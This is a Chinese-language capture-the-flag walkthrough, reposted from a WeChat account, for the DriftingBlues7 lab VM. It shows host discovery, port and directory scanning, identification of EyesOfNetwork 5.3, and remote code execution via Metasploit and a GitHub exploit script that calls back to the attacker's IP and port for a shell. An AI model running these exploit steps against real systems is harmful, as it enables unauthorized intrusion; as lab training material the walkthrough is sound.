driftingblues7

admin 2025年6月7日10:17:28评论2 views字数 549阅读1分49秒阅读模式

攻击者IP:192.168.56.108 桥接(自动)vmare

受害者IP:192.168.56.129 仅主机 vxbox

主机发现

arp-scan -l

driftingblues7

端口扫描

nmap -sV 192.168.56.129

driftingblues7

跳转到登陆页面

eyes of network

https://192.168.56.129/login.php##

driftingblues7

信息收集

登陆失败

driftingblues7

目录扫描          dirsearch -u https://192.168.56.129

driftingblues7

获得版本号

EyesOfNetwork web interface 5.3

/README.md

/bower.json

driftingblues7

driftingblues7

找到版本漏洞

searchsploit eyes of network 5.3 

driftingblues7

方法1:msf

启动msf

设置 kali:set lhost 192.168.56.108          设置攻击目录:set rhosts 192.168.56.129          运行模块:run

driftingblues7

driftingblues7

driftingblues7

方法2:下载exp

https://github.com/h4knet/eonrce

driftingblues7

chmod +x eonrce.py 给权限

python eonrce.py https://192.168.56.129 -ip 192.168.56.108 -port 1111 运行脚本

driftingblues7

拿到flag

driftingblues7

原文始发于微信公众号(王之暴龙战神):driftingblues7

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年6月7日10:17:28
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   driftingblues7http://cn-sec.com/archives/3802565.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息